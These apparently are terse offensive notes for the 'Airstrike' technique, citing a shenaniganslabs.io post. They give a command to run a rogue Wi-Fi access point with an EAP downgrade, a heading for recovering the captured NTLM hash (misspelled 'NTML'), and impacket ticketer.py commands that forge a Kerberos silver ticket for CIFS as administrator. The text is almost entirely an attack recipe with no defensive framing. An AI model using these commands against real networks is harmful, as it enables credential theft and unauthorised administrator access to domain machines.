Airstrike
https://shenaniganslabs.io/2021/04/13/Airstrike.html
Step 1 - Access Point
python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -b <AP_BSSID> --eap --downgrade <weakest|balanced>
Step 2 - Recovering the NTML hash
Step 3 - Forge a silver ticket for the CIFS service on the device
ticketer.py -nthash <NTLM> -domain-sid <domain_SID> -domain <fqdn_domain> -spn cifs/<fqdn_computer_name> administrator
export KRB5CCNAME=administrator.ccache